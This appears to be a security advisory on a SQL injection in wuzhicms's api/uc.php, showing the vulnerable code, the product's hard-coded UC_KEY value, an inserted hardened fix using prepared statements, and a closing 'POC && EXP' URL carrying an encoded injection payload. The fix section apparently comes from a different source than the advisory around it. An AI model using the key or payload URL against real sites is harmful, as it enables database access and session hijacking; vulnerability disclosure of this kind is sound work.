==========================
Advisory: wuzhicms api/uc.php SQL Injection Vulnerability
Author: snake.jin@DBAppSecurity
Affected Version: Latest 4.1.0
Vulnerability Description
Recently, I found an SQL Injection Vulnerability in 'wuzhicms' because of the hard-coded 'UC_KEY'.
Vulnerable cgi: /api/uc.php
<?php
// Excerpt from api/uc.php: the 'code' request parameter is decrypted with UC_KEY
// and the result is parsed straight into $get.
$code = isset($GLOBALS['code']) ? $GLOBALS['code'] : '';
$get = $GLOBALS;
parse_str(_authcode($code, 'DECODE', UC_KEY), $get);
if(MAGIC_QUOTES_GPC) $get = _stripslashes($get);
...
// $get['action'] selects which uc_note method handles the request.
if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) {
    $uc_note = new uc_note();
    header('Content-type: text/html; charset='.CHARSET);
    $action = $get['action'];
    echo $uc_note->$action($get, $post);
    exit();
} else {
    exit(API_RETURN_FAILED);
}
...
function synlogin($get, $post) {
    header('P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"');
    // 'username' comes from the decrypted $get and is concatenated into the
    // WHERE clause without escaping or binding.
    $username = $get['username'];
    $r = $this->member->db->get_one('member', 'username="'.$username.'"');
    if($r){
        $cookietime = COOKIE_TTL ? SYS_TIME.COOKIE_TTL : 0;
        set_cookie('auth', encode($r['uid']."\t".$r['password']."\t".$cookietime, substr(md5(_KEY), 8, 8)), $cookietime);
        set_cookie('_uid', $r['uid'], $cookietime);
        set_cookie('_username', $r['username'], $cookietime);
        set_cookie('_groupid', $r['groupid'], $cookietime);
    }
    return API_RETURN_SUCCEED;
}
?>
As the code above shows, anyone who knows UC_KEY can produce a 'code' value that _authcode() decrypts into arbitrary $get parameters, and the 'username' parameter is concatenated into the SQL query unescaped, which causes the SQL injection.
Fortunately, in the latest version UC_KEY is hard-coded as 'uc_key' => 'e063rbkHX22RAvIg'.
So we can use the code below to calculate the 'code' value:
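The generator the advisory refers to is not reproduced on this page. What follows instead is an added example, not code from the advisory or from wuzhicms, showing the two fixes a maintainer would apply to api/uc.php: a per-installation UC_KEY generated at install time instead of a literal in the source, and a member lookup that binds 'username' as a parameter instead of concatenating it into the query. The function names generateUcKey(), isValidUsername(), findMemberByUsername() and synloginHardened(), the use of mysqli, and the 'member' table layout are assumptions made here; the column names follow the fields the excerpt above reads.

```php
<?php
// Added example, not wuzhicms code. Hardened counterpart of the synlogin() excerpt
// in the advisory. Function names, the mysqli connection and the 'member' table
// layout are assumptions for this example.

// Root cause: a secret that ships in the source is known to everyone with the
// source. Generate the key once at install time and store it in the site config.
function generateUcKey(): string
{
    return bin2hex(random_bytes(16)); // 128 bits from the CSPRNG, 32 hex characters
}

// Defence in depth: reject a username that does not match the registration rules
// before it reaches the database layer at all.
function isValidUsername($username): bool
{
    return is_string($username) && preg_match('/^[A-Za-z0-9_]{2,32}$/', $username) === 1;
}

// The fix for the injection itself: a prepared statement with a bound parameter.
// Whatever $username contains is sent as data, never as part of the SQL text.
function findMemberByUsername(mysqli $db, string $username): ?array
{
    $stmt = $db->prepare(
        'SELECT uid, username, password, groupid FROM member WHERE username = ? LIMIT 1'
    );
    if ($stmt === false) {
        return null;
    }
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Same inputs and return values as the original synlogin(), but the query can no
// longer be steered by the request.
function synloginHardened(mysqli $db, array $get): string
{
    $username = $get['username'] ?? null;
    if (!isValidUsername($username)) {
        return API_RETURN_FAILED;
    }
    $r = findMemberByUsername($db, $username);
    if ($r !== null) {
        // Issue the session cookies exactly as the original does.
        $cookietime = COOKIE_TTL ? SYS_TIME . COOKIE_TTL : 0;
        set_cookie('auth', encode($r['uid'] . "\t" . $r['password'] . "\t" . $cookietime, substr(md5(_KEY), 8, 8)), $cookietime);
        set_cookie('_uid', $r['uid'], $cookietime);
        set_cookie('_username', $r['username'], $cookietime);
        set_cookie('_groupid', $r['groupid'], $cookietime);
    }
    return API_RETURN_SUCCEED;
}
```

The prepared statement is the fix that closes the injection; the key rotation is what restores the trust boundary the endpoint relies on, since every request to /api/uc.php is accepted purely on the strength of UC_KEY. Any installation that shipped with the literal key above should treat it as public and regenerate it, and the validity window of the decrypted payload (the web-server-time dependence the advisory notes) should be kept short so a captured 'code' value cannot be replayed later.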
==========================
POC && EXP
http://192.168.11.1/api/uc.php?code=50cbKM2US%2FRwJ7t%2FOIC6bRKnZEAAWvXoYeOnjmkm1lK%2F97owQgkczkqOAN4mvz%2B8VHyLhJL786q1%2FOrPS0bEbkhFBO9ugWAYjf4XLWIL9m2gPxqtBAp%2BvqOvbpnJP%2Fkal8sCBQDoqcZeS6KY2%2BDsu7LW
// Notice: the 'code' parameter value depends on the web server time.
Just enjoy it!